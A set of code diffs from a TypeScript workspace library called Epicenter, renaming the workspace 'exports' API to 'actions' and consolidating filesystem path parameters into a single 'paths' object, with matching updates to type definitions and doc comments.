-type BaseWorkspaceClient = WorkspaceExports & {
+type BaseWorkspaceClient = ActionExports & {
 	$ydoc: unknown;
 	destroy: () => Promise<void>;
 	[Symbol.asyncDispose]: () => Promise<void>;
@@ -41,7 +41,7 @@ export type ActionInfo = {
  * each action with its metadata. The destroy and Symbol.asyncDispose methods
  * at client and workspace levels are automatically excluded.
  *
- * Supports nested exports: actions can be organized in namespaces like
+ * Supports nested actions: actions can be organized in namespaces like
  * `{ users: { getAll: defineQuery(...), crud: { create: defineMutation(...) } } }`
  *
  * @param client - The Epicenter client with workspace namespaces

--- a/packages/epicenter/src/core/workspace/client.shared.ts
+++ b/packages/epicenter/src/core/workspace/client.shared.ts
@@ -5,13 +5,13 @@
  * Platform-specific types and initialization are in client.browser.ts and client.node.ts.
  */
 
-import { type Action, type ActionExports, walkActions } from '../actions';
+import { type Action, type Actions, walkActions } from '../actions';
 
 /**
  * Base workspace client shape for iterActions compatibility.
  * Platform-specific clients extend this with additional properties.
  */
-type BaseWorkspaceClient = ActionExports & {
+type BaseWorkspaceClient = Actions & {
 	$ydoc: unknown;
 	destroy: () => Promise<void>;
 	[Symbol.asyncDispose]: () => Promise<void>;
@@ -82,10 +82,10 @@ export function* iterActions(
 			destroy: _workspaceDestroy,
 			[Symbol.asyncDispose]: _workspaceAsyncDispose,
 			$ydoc: _$ydoc,
-			...workspaceExports
+			...workspaceActions
 		} = workspaceClient as BaseWorkspaceClient;
 
-		for (const { path, action } of walkActions(workspaceExports)) {
+		for (const { path, action } of walkActions(workspaceActions)) {
 			yield {
 				workspaceId,
 				actionPath: path,

--- a/packages/epicenter/src/core/workspace/config.browser.ts
+++ b/packages/epicenter/src/core/workspace/config.browser.ts
@@ -4,7 +4,7 @@
  * Uses browser Provider type which doesn't include filesystem paths.
  */
 
-import type { ActionExports } from '../actions';
+import type { Actions } from '../actions';
 import type { Provider } from '../provider.browser';
 import type { WorkspaceSchema } from '../schema';
 import {
@@ -46,7 +46,7 @@ export function defineWorkspace<
 	const TId extends string,
 	TWorkspaceSchema extends WorkspaceSchema,
 	const TProviders extends Record<string, Provider<TWorkspaceSchema>>,
-	TActions extends ActionExports,
+	TActions extends Actions,
 >(
 	workspace: WorkspaceConfig<
 		TDeps,
@@ -68,7 +68,7 @@ export function defineWorkspace<
  * ## Provider Type Inference
  *
  * The `TProviders` type parameter captures the actual provider functions you pass.
- * The `exports` factory receives provider exports derived via `InferProviderExports`:
+ * The `exports` factory receives provider exports derived via `InferProviders`:
  * - Provider returns `{ db: Db }` → exports receives `{ db: Db }`
  * - Provider returns `void` → exports receives `Record<string, never>` (empty object)
  * - Provider returns `Promise<{ db: Db }>` → exports receives `{ db: Db }` (unwrapped)
@@ -81,7 +81,7 @@ export type WorkspaceConfig<
 		string,
 		Provider<TWorkspaceSchema>
 	>,
-	TActions extends ActionExports = ActionExports,
+	TActions extends Actions = Actions,
 > = {
 	id: TId;
 	tables: TWorkspaceSchema;

--- a/packages/epicenter/src/core/workspace/config.browser.ts
+++ b/packages/epicenter/src/core/workspace/config.browser.ts
@@ -4,17 +4,17 @@
  * Uses browser Provider type which doesn't include filesystem paths.
  */
 
-import type { WorkspaceExports } from '../actions';
+import type { ActionExports } from '../actions';
 import type { Provider } from '../provider.browser';
 import type { WorkspaceSchema } from '../schema';
 import {
 	type AnyWorkspaceConfig,
 	validateWorkspaceConfig,
-	type WorkspaceExportsContext,
+	type ActionsContext,
 } from './config.shared';
 
 // Re-export shared types
-export type { AnyWorkspaceConfig, WorkspacesToExports } from './config.shared';
+export type { AnyWorkspaceConfig, WorkspacesToActions } from './config.shared';
 
 /**
  * Define a collaborative workspace with YJS-first architecture.
@@ -46,16 +46,16 @@ export function defineWorkspace<
 	const TId extends string,
 	TWorkspaceSchema extends WorkspaceSchema,
 	const TProviders extends Record<string, Provider<TWorkspaceSchema>>,
-	TExports extends WorkspaceExports,
+	TActions extends ActionExports,
 >(
 	workspace: WorkspaceConfig<
 		TDeps,
 		TId,
 		TWorkspaceSchema,
 		TProviders,
-		TExports
+		TActions
 	>,
-): WorkspaceConfig<TDeps, TId, TWorkspaceSchema, TProviders, TExports> {
+): WorkspaceConfig<TDeps, TId, TWorkspaceSchema, TProviders, TActions> {
 	validateWorkspaceConfig(workspace);
 	return workspace;
 }
@@ -81,23 +81,23 @@ export type WorkspaceConfig<
 		string,
 		Provider<TWorkspaceSchema>
 	>,
-	TExports extends WorkspaceExports = WorkspaceExports,
+	TActions extends ActionExports = ActionExports,
 > = {
 	id: TId;
 	tables: TWorkspaceSchema;
 	dependencies?: TDeps;
 	providers: TProviders;
 	/**
-	 * Factory function that creates workspace exports (actions, utilities, etc.)
+	 * Factory function that creates workspace actions.
 	 *
 	 * @param context.tables - The workspace tables for direct table operations
 	 * @param context.schema - The workspace schema (table definitions)
 	 * @param context.validators - Schema validators for runtime validation and arktype composition
 	 * @param context.providers - Provider-specific exports (queries, sync operations, etc.)
-	 * @param context.workspaces - Exports from dependency workspaces (if any)
+	 * @param context.workspaces - Actions from dependency workspaces (if any)
 	 * @param context.blobs - Blob storage for binary files, namespaced by table
 	 */
-	exports: (
-		context: WorkspaceExportsContext<TWorkspaceSchema, TDeps, TProviders>,
-	) => TExports;
+	actions: (
+		context: ActionsContext<TWorkspaceSchema, TDeps, TProviders>,
+	) => TActions;
 };

--- a/packages/epicenter/src/core/workspace/config.node.ts
+++ b/packages/epicenter/src/core/workspace/config.node.ts
@@ -4,7 +4,7 @@
  * Uses Node Provider type which includes required filesystem paths.
  */
 
-import type { ActionExports } from '../actions';
+import type { Actions } from '../actions';
 import type { Provider } from '../provider.node';
 import type { WorkspaceSchema } from '../schema';
 import {
@@ -47,7 +47,7 @@ export function defineWorkspace<
 	const TId extends string,
 	TWorkspaceSchema extends WorkspaceSchema,
 	const TProviders extends Record<string, Provider<TWorkspaceSchema>>,
-	TActions extends ActionExports,
+	TActions extends Actions,
 >(
 	workspace: WorkspaceConfig<
 		TDeps,
@@ -71,7 +71,7 @@ export function defineWorkspace<
  * ## Provider Type Inference
  *
  * The `TProviders` type parameter captures the actual provider functions you pass.
- * The `exports` factory receives provider exports derived via `InferProviderExports`:
+ * The `exports` factory receives provider exports derived via `InferProviders`:
  * - Provider returns `{ db: Db }` → exports receives `{ db: Db }`
  * - Provider returns `void` → exports receives `Record<string, never>` (empty object)
  * - Provider returns `Promise<{ db: Db }>` → exports receives `{ db: Db }` (unwrapped)
@@ -84,7 +84,7 @@ export type WorkspaceConfig<
 		string,
 		Provider<TWorkspaceSchema>
 	>,
-	TActions extends ActionExports = ActionExports,
+	TActions extends Actions = Actions,
 > = {
 	id: TId;
 	tables: TWorkspaceSchema;

--- a/packages/epicenter/src/core/workspace/config.node.ts
+++ b/packages/epicenter/src/core/workspace/config.node.ts
@@ -4,13 +4,13 @@
  * Uses Node Provider type which includes required filesystem paths.
  */
 
-import type { WorkspaceExports } from '../actions';
+import type { ActionExports } from '../actions';
 import type { Provider } from '../provider.node';
 import type { WorkspaceSchema } from '../schema';
 import {
 	type AnyWorkspaceConfig,
 	validateWorkspaceConfig,
-	type WorkspaceExportsContext,
+	type ActionsContext,
 } from './config.shared';
 
 // Re-export shared types
@@ -47,16 +47,16 @@ export function defineWorkspace<
 	const TId extends string,
 	TWorkspaceSchema extends WorkspaceSchema,
 	const TProviders extends Record<string, Provider<TWorkspaceSchema>>,
-	TExports extends WorkspaceExports,
+	TActions extends ActionExports,
 >(
 	workspace: WorkspaceConfig<
 		TDeps,
 		TId,
 		TWorkspaceSchema,
 		TProviders,
-		TExports
+		TActions
 	>,
-): WorkspaceConfig<TDeps, TId, TWorkspaceSchema, TProviders, TExports> {
+): WorkspaceConfig<TDeps, TId, TWorkspaceSchema, TProviders, TActions> {
 	validateWorkspaceConfig(workspace);
 	return workspace;
 }
@@ -84,24 +84,24 @@ export type WorkspaceConfig<
 		string,
 		Provider<TWorkspaceSchema>
 	>,
-	TExports extends WorkspaceExports = WorkspaceExports,
+	TActions extends ActionExports = ActionExports,
 > = {
 	id: TId;
 	tables: TWorkspaceSchema;
 	dependencies?: TDeps;
 	providers: TProviders;
 	/**
-	 * Factory function that creates workspace exports (actions, utilities, etc.)
+	 * Factory function that creates workspace actions (queries, mutations, utilities, etc.)
 	 *
 	 * @param context.tables - The workspace tables for direct table operations
 	 * @param context.schema - The workspace schema (table definitions)
 	 * @param context.validators - Schema validators for runtime validation and arktype composition
 	 * @param context.providers - Provider-specific exports (queries, sync operations, etc.)
-	 * @param context.workspaces - Exports from dependency workspaces (if any)
+	 * @param context.workspaces - Actions from dependency workspaces (if any)
 	 * @param context.blobs - Blob storage for binary files, namespaced by table
 	 * @param context.paths - Filesystem paths (Node/Bun only, undefined in browser)
 	 */
-	exports: (
-		context: WorkspaceExportsContext<TWorkspaceSchema, TDeps, TProviders>,
-	) => TExports;
+	actions: (
+		context: ActionsContext<TWorkspaceSchema, TDeps, TProviders>,
+	) => TActions;
 };

--- a/packages/epicenter/src/core/workspace/config.node.ts
+++ b/packages/epicenter/src/core/workspace/config.node.ts
@@ -14,7 +14,7 @@ import {
 } from './config.shared';
 
 // Re-export shared types
-export type { AnyWorkspaceConfig, WorkspacesToExports } from './config.shared';
+export type { AnyWorkspaceConfig, WorkspacesToActions } from './config.shared';
 
 /**
  * Define a collaborative workspace with YJS-first architecture.
@@ -36,9 +36,9 @@ export type { AnyWorkspaceConfig, WorkspacesToExports } from './config.shared';
  *
  * ## Node/Bun-Specific Notes
  *
- * In Node/Bun environments, providers have access to filesystem paths:
- * - `storageDir`: Absolute path to the storage directory
- * - `epicenterDir`: Absolute path to `.epicenter` directory for provider data
+ * In Node/Bun environments, the exports factory has access to filesystem paths via `paths`:
+ * - `paths.project`: Project root directory
+ * - `paths.epicenter`: The `.epicenter` directory for internal data
  *
  * @see defineWorkspace in config.browser.ts for browser-specific version
  */
@@ -64,9 +64,9 @@ export function defineWorkspace<
 /**
  * Node/Bun workspace configuration.
  *
- * Uses Node Provider type - providers have access to filesystem paths:
- * - `storageDir`: Required storage directory path
- * - `epicenterDir`: Required `.epicenter` directory path
+ * Uses Node Provider type - the exports factory has access to filesystem paths via `paths`:
+ * - `paths.project`: Project root directory
+ * - `paths.epicenter`: The `.epicenter` directory for internal data
  *
  * ## Provider Type Inference
  *
@@ -99,8 +99,7 @@ export type WorkspaceConfig<
 	 * @param context.providers - Provider-specific exports (queries, sync operations, etc.)
 	 * @param context.workspaces - Exports from dependency workspaces (if any)
 	 * @param context.blobs - Blob storage for binary files, namespaced by table
-	 * @param context.storageDir - Storage directory path (Node/Bun only)
-	 * @param context.epicenterDir - `.epicenter` directory path (Node/Bun only)
+	 * @param context.paths - Filesystem paths (Node/Bun only, undefined in browser)
 	 */
 	exports: (
 		context: WorkspaceExportsContext<TWorkspaceSchema, TDeps, TProviders>,

--- a/packages/epicenter/src/core/workspace/config.shared.ts
+++ b/packages/epicenter/src/core/workspace/config.shared.ts
@@ -5,10 +5,10 @@
  * these with platform-appropriate provider types.
  */
 
-import type { ActionExports } from '../actions';
+import type { Actions } from '../actions';
 import type { WorkspaceBlobs } from '../blobs/types';
 import type { Tables } from '../db/core';
-import type { InferProviderExports, ProviderExports } from '../provider.shared';
+import type { InferProviders, Providers } from '../provider.shared';
 import type { WorkspaceSchema, WorkspaceValidators } from '../schema';
 import type { WorkspacePaths } from '../types';
 
@@ -23,7 +23,7 @@ import type { WorkspacePaths } from '../types';
  */
 export type AnyWorkspaceConfig = {
 	id: string;
-	actions: (context: any) => ActionExports;
+	actions: (context: any) => Actions;
 };
 
 /**
@@ -52,7 +52,7 @@ export type WorkspacesToActions<WS extends readonly AnyWorkspaceConfig[]> = {
 	[W in WS[number] as W extends { id: infer TId extends string }
 		? TId
 		: never]: W extends {
-		actions: (context: any) => infer TActions extends ActionExports;
+		actions: (context: any) => infer TActions extends Actions;
 	}
 		? TActions
 		: never;
@@ -70,14 +70,14 @@ export type ActionsContext<
 	TDeps extends readonly AnyWorkspaceConfig[],
 	TProviders extends Record<
 		string,
-		(context: any) => ProviderExports | void | Promise<ProviderExports | void>
+		(context: any) => Providers | void | Promise<Providers | void>
 	>,
 > = {
 	tables: Tables<TWorkspaceSchema>;
 	schema: TWorkspaceSchema;
 	validators: WorkspaceValidators<TWorkspaceSchema>;
 	workspaces: WorkspacesToActions<TDeps>;
-	providers: { [K in keyof TProviders]: InferProviderExports<TProviders[K]> };
+	providers: { [K in keyof TProviders]: InferProviders<TProviders[K]> };
 	blobs: WorkspaceBlobs<TWorkspaceSchema>;
 	paths: WorkspacePaths | undefined;
 };

--- a/packages/epicenter/src/core/workspace/config.shared.ts
+++ b/packages/epicenter/src/core/workspace/config.shared.ts
@@ -5,7 +5,7 @@
  * these with platform-appropriate provider types.
  */
 
-import type { WorkspaceExports } from '../actions';
+import type { ActionExports } from '../actions';
 import type { WorkspaceBlobs } from '../blobs/types';
 import type { Tables } from '../db/core';
 import type { InferProviderExports, ProviderExports } from '../provider.shared';
@@ -23,38 +23,38 @@ import type { WorkspacePaths } from '../types';
  */
 export type AnyWorkspaceConfig = {
 	id: string;
-	exports: (context: any) => WorkspaceExports;
+	actions: (context: any) => ActionExports;
 };
 
 /**
- * Maps an array of workspace configs to an object of exports keyed by workspace id.
+ * Maps an array of workspace configs to an object of actions keyed by workspace id.
  *
  * Takes an array of workspace dependencies and merges them into a single object where:
  * - Each key is a dependency id
- * - Each value is the exports object from that dependency (actions and utilities)
+ * - Each value is the actions object from that dependency (queries, mutations, and utilities)
  *
- * This allows accessing dependency exports as `workspaces.dependencyId.exportName()`.
+ * This allows accessing dependency actions as `workspaces.dependencyId.actionName()`.
  *
  * @example
  * ```typescript
  * // Given dependency configs:
- * const authWorkspace = defineWorkspace({ id: 'auth', exports: () => ({ login: ..., logout: ..., validateToken: ... }) })
- * const storageWorkspace = defineWorkspace({ id: 'storage', exports: () => ({ upload: ..., download: ..., MAX_FILE_SIZE: ... }) })
+ * const authWorkspace = defineWorkspace({ id: 'auth', actions: () => ({ login: ..., logout: ..., validateToken: ... }) })
+ * const storageWorkspace = defineWorkspace({ id: 'storage', actions: () => ({ upload: ..., download: ..., MAX_FILE_SIZE: ... }) })
  *
- * // WorkspacesToExports<[typeof authWorkspace, typeof storageWorkspace]> produces:
+ * // WorkspacesToActions<[typeof authWorkspace, typeof storageWorkspace]> produces:
  * {
  *   auth: { login: ..., logout: ..., validateToken: ... },
  *   storage: { upload: ..., download: ..., MAX_FILE_SIZE: ... }
  * }
  * ```
  */
-export type WorkspacesToExports<WS extends readonly AnyWorkspaceConfig[]> = {
+export type WorkspacesToActions<WS extends readonly AnyWorkspaceConfig[]> = {
 	[W in WS[number] as W extends { id: infer TId extends string }
 		? TId
 		: never]: W extends {
-		exports: (context: any) => infer TExports extends WorkspaceExports;
+		actions: (context: any) => infer TActions extends ActionExports;
 	}
-		? TExports
+		? TActions
 		: never;
 };
 
@@ -65,7 +65,7 @@ export type WorkspacesToExports<WS extends readonly AnyWorkspaceConfig[]> = {
  * @typeParam TDeps - Array of dependency workspace configs
  * @typeParam TProviders - Record of provider functions
  */
-export type WorkspaceExportsContext<
+export type ActionsContext<
 	TWorkspaceSchema extends WorkspaceSchema,
 	TDeps extends readonly AnyWorkspaceConfig[],
 	TProviders extends Record<
@@ -76,7 +76,7 @@ export type WorkspaceExportsContext<
 	tables: Tables<TWorkspaceSchema>;
 	schema: TWorkspaceSchema;
 	validators: WorkspaceValidators<TWorkspaceSchema>;
-	workspaces: WorkspacesToExports<TDeps>;
+	workspaces: WorkspacesToActions<TDeps>;
 	providers: { [K in keyof TProviders]: InferProviderExports<TProviders[K]> };
 	blobs: WorkspaceBlobs<TWorkspaceSchema>;
 	paths: WorkspacePaths | undefined;

--- a/packages/epicenter/src/core/workspace/config.shared.ts
+++ b/packages/epicenter/src/core/workspace/config.shared.ts
@@ -10,7 +10,7 @@ import type { WorkspaceBlobs } from '../blobs/types';
 import type { Tables } from '../db/core';
 import type { InferProviderExports, ProviderExports } from '../provider.shared';
 import type { WorkspaceSchema, WorkspaceValidators } from '../schema';
-import type { EpicenterDir, StorageDir } from '../types';
+import type { WorkspacePaths } from '../types';
 
 /**
  * Minimal workspace constraint for generic bounds.
@@ -79,8 +79,7 @@ export type WorkspaceExportsContext<
 	workspaces: WorkspacesToExports<TDeps>;
 	providers: { [K in keyof TProviders]: InferProviderExports<TProviders[K]> };
 	blobs: WorkspaceBlobs<TWorkspaceSchema>;
-	storageDir: StorageDir | undefined;
-	epicenterDir: EpicenterDir | undefined;
+	paths: WorkspacePaths | undefined;
 };
 
 /**

--- a/packages/epicenter/src/core/workspace/config.ts
+++ b/packages/epicenter/src/core/workspace/config.ts
@@ -1,11 +1,7 @@
-import type { ActionExports } from '../actions';
+import type { Actions } from '../actions';
 import type { WorkspaceBlobs } from '../blobs';
 import type { Tables } from '../db/core';
-import type {
-	Provider,
-	ProviderExports,
-	WorkspaceProviderMap,
-} from '../provider';
+import type { Provider, Providers, WorkspaceProviderMap } from '../provider';
 import type { WorkspaceSchema, WorkspaceValidators } from '../schema';
 import type { EpicenterDir, ProjectDir } from '../types';
 
@@ -113,7 +109,7 @@ export function defineWorkspace<
 	const TId extends string,
 	TWorkspaceSchema extends WorkspaceSchema,
 	const TProviderResults extends WorkspaceProviderMap,
-	TActions extends ActionExports,
+	TActions extends Actions,
 >(
 	workspace: WorkspaceConfig<
 		TDeps,
@@ -170,7 +166,7 @@ export type WorkspaceConfig<
 	TId extends string = string,
 	TWorkspaceSchema extends WorkspaceSchema = WorkspaceSchema,
 	TProviderResults extends WorkspaceProviderMap = WorkspaceProviderMap,
-	TActions extends ActionExports = ActionExports,
+	TActions extends Actions = Actions,
 > = {
 	id: TId;
 	tables: TWorkspaceSchema;
@@ -178,9 +174,7 @@ export type WorkspaceConfig<
 	providers: {
 		[K in keyof TProviderResults]: Provider<
 			TWorkspaceSchema,
-			TProviderResults[K] extends ProviderExports
-				? TProviderResults[K]
-				: ProviderExports
+			TProviderResults[K] extends Providers ? TProviderResults[K] : Providers
 		>;
 	};
 	/**
@@ -241,7 +235,7 @@ export type WorkspaceConfig<
 export type AnyWorkspaceConfig = {
 	id: string;
 	// biome-ignore lint/suspicious/noExplicitAny: Minimal constraint to prevent infinite type recursion
-	actions: (context: any) => ActionExports;
+	actions: (context: any) => Actions;
 };
 
 /**
@@ -267,7 +261,7 @@ export type WorkspacesToActions<WS extends readonly AnyWorkspaceConfig[]> = {
 		? TId
 		: never]: W extends {
 		// biome-ignore lint/suspicious/noExplicitAny: Extracting action return type from generic constraint
-		actions: (context: any) => infer TActions extends ActionExports;
+		actions: (context: any) => infer TActions extends Actions;
 	}
 		? TActions
 		: never;

--- a/packages/epicenter/src/core/workspace/config.ts
+++ b/packages/epicenter/src/core/workspace/config.ts
@@ -1,4 +1,4 @@
-import type { WorkspaceExports } from '../actions';
+import type { ActionExports } from '../actions';
 import type { WorkspaceBlobs } from '../blobs';
 import type { Tables } from '../db/core';
 import type {
@@ -10,9 +10,9 @@ import type { WorkspaceSchema, WorkspaceValidators } from '../schema';
 import type { EpicenterDir, ProjectDir } from '../types';
 
 /**
- * Filesystem paths available to workspace exports factory.
+ * Filesystem paths available to workspace actions factory.
  *
- * Unlike `ProviderPaths`, this omits `provider` since the exports factory
+ * Unlike `ProviderPaths`, this omits `provider` since the actions factory
  * operates at the workspace level, not the individual provider level.
  */
 export type WorkspacePaths = {
@@ -35,8 +35,8 @@ export type WorkspacePaths = {
  * const client = await createClient([blogWorkspace, authWorkspace]);
  *
  * // Each workspace is accessible by its id:
- * client.blog.createPost(...)  // blogWorkspace exports
- * client.auth.login(...)       // authWorkspace exports
+ * client.blog.createPost(...)  // blogWorkspace actions
+ * client.auth.login(...)       // authWorkspace actions
  * ```
  *
  * ## Workspace Structure
@@ -44,13 +44,13 @@ export type WorkspacePaths = {
  * Each workspace is a self-contained module with:
  * - **tables**: Column schemas (pure JSON, no Drizzle)
  * - **providers**: Persistence, sync, materializers (SQLite, markdown, vector, etc.)
- * - **exports**: Actions and utilities with access to tables and providers
+ * - **actions**: Queries and mutations with access to tables and providers
  *
  * ## Data Flow
  *
  * **Writes**: Go to YJS document -> auto-sync to all materializer providers
  * ```typescript
- * tables.posts.set({ id: '1', title: 'Hello' });
+ * tables.posts.upsert({ id: '1', title: 'Hello' });
  * // YJS updated -> SQLite synced -> Markdown synced -> Vector synced
  * ```
  *
@@ -67,7 +67,7 @@ export type WorkspacePaths = {
  *
  *   tables: {
  *     posts: {
- *       // id is auto-included, no need to specify
+ *       id: id(),
  *       title: text(),
  *       content: ytext({ nullable: true }),
  *       category: select({ options: ['tech', 'personal'] }),
@@ -81,7 +81,7 @@ export type WorkspacePaths = {
  *     markdown: markdownProvider,
  *   },
  *
- *   exports: ({ tables, providers }) => ({
+ *   actions: ({ tables, providers }) => ({
  *     getPublishedPosts: defineQuery({
  *       handler: async () => {
  *         return await providers.sqlite.posts
@@ -91,7 +91,7 @@ export type WorkspacePaths = {
  *     }),
  *
  *     createPost: defineMutation({
- *       input: Type.Object({ title: Type.String() }),
+ *       input: type({ title: 'string' }),
  *       handler: async ({ title }) => {
  *         const post = {
  *           id: generateId(),
@@ -100,7 +100,7 @@ export type WorkspacePaths = {
  *           category: 'tech',
  *           views: 0,
  *         };
- *         tables.posts.set(post);
+ *         tables.posts.upsert(post);
  *         return post;
  *       }
  *     })
@@ -113,22 +113,20 @@ export function defineWorkspace<
 	const TId extends string,
 	TWorkspaceSchema extends WorkspaceSchema,
 	const TProviderResults extends WorkspaceProviderMap,
-	TExports extends WorkspaceExports,
+	TActions extends ActionExports,
 >(
 	workspace: WorkspaceConfig<
 		TDeps,
 		TId,
 		TWorkspaceSchema,
 		TProviderResults,
-		TExports
+		TActions
 	>,
-): WorkspaceConfig<TDeps, TId, TWorkspaceSchema, TProviderResults, TExports> {
-	// Validate workspace ID
+): WorkspaceConfig<TDeps, TId, TWorkspaceSchema, TProviderResults, TActions> {
 	if (!workspace.id || typeof workspace.id !== 'string') {
 		throw new Error('Workspace must have a valid string ID');
 	}
 
-	// Validate dependencies
 	if (workspace.dependencies) {
 		if (!Array.isArray(workspace.dependencies)) {
 			throw new Error('Dependencies must be an array of workspace configs');
@@ -147,7 +145,7 @@ export function defineWorkspace<
 }
 
 /**
- * Workspace configuration
+ * Workspace configuration.
  *
  * Fully-featured workspace configuration used for defining workspaces and their dependencies.
  *
@@ -157,21 +155,22 @@ export function defineWorkspace<
  * This prevents infinite type recursion while providing type information for action access.
  *
  * By using `AnyWorkspaceConfig` (which only includes `id` and `actions`), we stop
- * recursive type inference. Without this constraint, TypeScript would try to infer dependencies
- * of dependencies infinitely, causing "Type instantiation is excessively deep" errors.
+ * recursive type inference. Without this constraint, TypeScript would try to infer
+ * dependencies of dependencies infinitely, causing "Type instantiation is excessively
+ * deep" errors.
  *
  * ## Runtime vs Type-level
  *
  * At runtime, all workspace configs have full properties (tables, providers, etc.).
- * The minimal constraint is purely for type inference. The flat/hoisted dependency resolution
- * ensures all workspaces are initialized correctly.
+ * The minimal constraint is purely for type inference. The flat/hoisted dependency
+ * resolution ensures all workspaces are initialized correctly.
  */
 export type WorkspaceConfig<
 	TDeps extends readonly AnyWorkspaceConfig[] = readonly AnyWorkspaceConfig[],
 	TId extends string = string,
 	TWorkspaceSchema extends WorkspaceSchema = WorkspaceSchema,
 	TProviderResults extends WorkspaceProviderMap = WorkspaceProviderMap,
-	TExports extends WorkspaceExports = WorkspaceExports,
+	TActions extends ActionExports = ActionExports,
 > = {
 	id: TId;
 	tables: TWorkspaceSchema;
@@ -185,54 +184,54 @@ export type WorkspaceConfig<
 		>;
 	};
 	/**
-	 * Factory function that creates workspace exports (actions, utilities, etc.)
+	 * Factory function that creates workspace actions (queries and mutations).
 	 *
-	 * @param context.tables - The workspace tables for direct table operations
-	 * @param context.schema - The workspace schema (table definitions)
-	 * @param context.validators - Schema validators for runtime validation and arktype composition
+	 * Actions are proxyable over HTTP/RPC and are exposed via the server.
+	 * Everything returned from this function should be a Query or Mutation
+	 * (created via defineQuery/defineMutation or from table helpers).
+	 *
+	 * @param context.tables - Workspace tables for direct table operations
+	 * @param context.schema - Workspace schema (table definitions)
+	 * @param context.validators - Schema validators for runtime validation
+	 * @param context.workspaces - Actions from dependency workspaces
 	 * @param context.providers - Provider-specific exports (queries, sync operations, etc.)
-	 * @param context.workspaces - Exports from dependency workspaces (if any)
 	 * @param context.blobs - Blob storage for binary files, namespaced by table
+	 * @param context.paths - Filesystem paths (undefined in browser)
 	 *
 	 * @example
 	 * ```typescript
-	 * exports: ({ tables, schema, validators, providers, blobs }) => ({
-	 *   // Expose schema for type inference in external scripts
-	 *   schema,
-	 *
-	 *   // Expose tables for direct access
-	 *   tables,
-	 *
-	 *   // Expose validators for external validation (e.g., migration scripts)
-	 *   validators,
-	 *
-	 *   // Define actions using table operations
-	 *   createPost: tables.posts.insert,
+	 * actions: ({ tables, providers }) => ({
+	 *   // Table CRUD operations (already defined as actions)
+	 *   createPost: tables.posts.upsert,
 	 *   getPost: tables.posts.get,
 	 *
-	 *   // Expose provider operations
-	 *   pullToMarkdown: providers.markdown.pullToMarkdown,
-	 *
-	 *   // Store and retrieve binary files
-	 *   uploadAttachment: (filename, data) => blobs.posts.put(filename, data),
-	 *   getAttachment: (filename) => blobs.posts.get(filename),
+	 *   // Custom actions
+	 *   getPublishedPosts: defineQuery({
+	 *     handler: async () => {
+	 *       return await providers.sqlite.posts
+	 *         .select()
+	 *         .where(isNotNull(providers.sqlite.posts.publishedAt))
+	 *     }
+	 *   }),
 	 * })
 	 * ```
 	 */
-	exports: (context: {
+	actions: (context: {
 		tables: Tables<TWorkspaceSchema>;
 		schema: TWorkspaceSchema;
 		validators: WorkspaceValidators<TWorkspaceSchema>;
-		workspaces: WorkspacesToExports<TDeps>;
+		workspaces: WorkspacesToActions<TDeps>;
 		providers: TProviderResults;
 		blobs: WorkspaceBlobs<TWorkspaceSchema>;
 		paths: WorkspacePaths | undefined;
-	}) => TExports;
+	}) => TActions;
 };
 
 /**
- * Minimal workspace constraint for generic bounds
- * Use this in `extends` clauses to avoid contravariance issues
+ * Minimal workspace constraint for generic bounds.
+ *
+ * Uses only `id` and `actions` to prevent infinite type recursion while still
+ * providing type information for dependency action access.
  *
  * @example
  * ```typescript
@@ -241,37 +240,35 @@ export type WorkspaceConfig<
  */
 export type AnyWorkspaceConfig = {
 	id: string;
-	exports: (context: any) => WorkspaceExports;
+	// biome-ignore lint/suspicious/noExplicitAny: Minimal constraint to prevent infinite type recursion
+	actions: (context: any) => ActionExports;
 };
 
 /**
- * Maps an array of workspace configs to an object of exports keyed by workspace id.
+ * Maps workspace configs to their actions keyed by workspace id.
  *
- * Takes an array of workspace dependencies and merges them into a single object where:
- * - Each key is a dependency id
- * - Each value is the exports object from that dependency (actions and utilities)
- *
- * This allows accessing dependency exports as `workspaces.dependencyId.exportName()`.
+ * Used to provide type-safe access to dependency workspace actions.
  *
  * @example
  * ```typescript
- * // Given dependency configs:
- * const authWorkspace = defineWorkspace({ id: 'auth', exports: () => ({ login: ..., logout: ..., validateToken: ... }) })
- * const storageWorkspace = defineWorkspace({ id: 'storage', exports: () => ({ upload: ..., download: ..., MAX_FILE_SIZE: ... }) })
+ * // Given dependencies:
+ * const authWorkspace = defineWorkspace({ id: 'auth', actions: () => ({ login, logout }) });
+ * const storageWorkspace = defineWorkspace({ id: 'storage', actions: () => ({ upload, download }) });
  *
- * // WorkspacesToExports<[typeof authWorkspace, typeof storageWorkspace]> produces:
+ * // WorkspacesToActions<[typeof authWorkspace, typeof storageWorkspace]> produces:
  * {
- *   auth: { login: ..., logout: ..., validateToken: ... },
- *   storage: { upload: ..., download: ..., MAX_FILE_SIZE: ... }
+ *   auth: { login: Query, logout: Mutation },
+ *   storage: { upload: Mutation, download: Query }
  * }
  * ```
  */
-export type WorkspacesToExports<WS extends readonly AnyWorkspaceConfig[]> = {
+export type WorkspacesToActions<WS extends readonly AnyWorkspaceConfig[]> = {
 	[W in WS[number] as W extends { id: infer TId extends string }
 		? TId
 		: never]: W extends {
-		exports: (context: any) => infer TExports extends WorkspaceExports;
+		// biome-ignore lint/suspicious/noExplicitAny: Extracting action return type from generic constraint
+		actions: (context: any) => infer TActions extends ActionExports;
 	}
-		? TExports
+		? TActions
 		: never;
 };

--- a/packages/epicenter/src/core/workspace/index.browser.ts
+++ b/packages/epicenter/src/core/workspace/index.browser.ts
@@ -23,6 +23,6 @@ export { iterActions } from './client.shared';
 export type {
 	AnyWorkspaceConfig,
 	WorkspaceConfig,
-	WorkspacesToExports,
+	WorkspacesToActions,
 } from './config';
 export { defineWorkspace } from './config';

--- a/packages/epicenter/src/core/workspace/index.node.ts
+++ b/packages/epicenter/src/core/workspace/index.node.ts
@@ -23,6 +23,6 @@ export { iterActions } from './client.shared';
 export type {
 	AnyWorkspaceConfig,
 	WorkspaceConfig,
-	WorkspacesToExports,
+	WorkspacesToActions,
 } from './config';
 export { defineWorkspace } from './config';

--- a/packages/epicenter/src/index.shared.ts
+++ b/packages/epicenter/src/index.shared.ts
@@ -38,14 +38,13 @@ export {
 	sql,
 } from 'drizzle-orm';
 
-export type { Action, Mutation, Query, ActionExports } from './core/actions';
+export type { Action, Mutation, Query, Actions } from './core/actions';
 
 // Action helpers
 export {
 	defineMutation,
 	defineQuery,
-	defineActionExports,
-	extractActions,
+	defineActions,
 	isAction,
 	isMutation,
 	isNamespace,
@@ -77,11 +76,11 @@ export { EpicenterOperationErr, IndexErr, ValidationErr } from './core/errors';
 export type {
 	Provider,
 	ProviderContext,
-	ProviderExports,
+	Providers,
 	WorkspaceProviderMap,
 } from './core/provider';
